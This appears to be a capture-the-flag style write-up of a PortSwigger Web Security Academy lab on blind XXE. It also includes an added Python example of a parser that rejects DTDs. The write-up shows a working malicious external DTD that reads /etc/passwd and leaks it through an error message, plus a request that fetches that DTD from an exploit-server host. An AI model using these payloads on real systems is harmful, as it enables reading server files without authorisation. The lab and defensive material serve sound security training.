Lab: Exploiting blind XXE to retrieve data via error messages

tags: Portswigger Web Security Academy Web
  • Description: This lab has a “Check stock” feature that parses XML input but does not display the result.
  • Goal: To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file. The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

Recon

This is very similar to the previous lab (Exploiting blind XXE to exfiltrate data using a malicious external DTD).

  1. Write the malicious DTD and store it on the exploit server:

     <!ENTITY % file SYSTEM "file:///etc/passwd">
     <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
     %eval;
     %exfil;

  2. Intercept the request that is sent when you click the "Check stock" button on any product page and add the following DOCTYPE to its XML body, replacing YOUR-DTD-URL with your exploit server URL, e.g. https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit

     <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

  3. Send packet!!!
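For the defending side, here is an added example (not part of the lab or of this writeup) of how the stock-check endpoint could parse the same request safely with Python's standard-library expat parser: any DOCTYPE is rejected before its entities are resolved, so the parser error can never carry file contents. The request bodies are constructed copies of the lab's benign and attack requests, with a placeholder exploit-server URL.

```python
"""Added example: hardened parsing of the lab's <stockCheck> request with the
standard-library expat parser. Any DOCTYPE is rejected before the DTD is read,
so %xxe; and the file:/// entity in the hosted DTD are never resolved and no
error message can leak file contents."""
import xml.parsers.expat as expat

class DoctypeRejected(ValueError):
    """Request carried a DTD; legitimate stock-check clients never send one."""

def parse_stock_check(xml_bytes: bytes) -> dict:
    """Return {'productId': ..., 'storeId': ...} or raise DoctypeRejected."""
    parser = expat.ParserCreate()
    # Second line of defence: never fetch parameter entities at all.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, stack = {}, []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at "<!DOCTYPE", before the internal subset (and %xxe;) is processed.
        raise DoctypeRejected(f"DOCTYPE {name!r} rejected (system id {system_id!r})")

    def on_external_entity(context, base, system_id, public_id):
        return 0  # refuse every external entity; 0 makes expat abort the parse

    def on_chars(data):
        if stack and stack[-1] in ("productId", "storeId"):
            fields[stack[-1]] = fields.get(stack[-1], "") + data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_bytes, True)
    return {k: v.strip() for k, v in fields.items()}

def is_accepted(xml_bytes: bytes) -> bool:
    """Request-filter view: True only when the body parsed without a DTD."""
    try:
        parse_stock_check(xml_bytes)
        return True
    except (DoctypeRejected, expat.ExpatError):
        return False

# Constructed sample bodies: a normal request and the lab's attack request
# (placeholder exploit-server URL).
BENIGN_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"""
ATTACK_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-YOUR-RANDOM-URL.exploit-server.net/exploit"> %xxe;]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"""
```

Logging the rejected DOCTYPE name and system id from `DoctypeRejected` gives a clean detection signal for attempts like this lab's payload.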

Exp

:::spoiler Malicious Server Payload

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

:::

:::spoiler Intercept Packet Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ad100a2040f8d8e821cce250179002c.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        1
    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>

:::

:::spoiler Success Screenshot


:::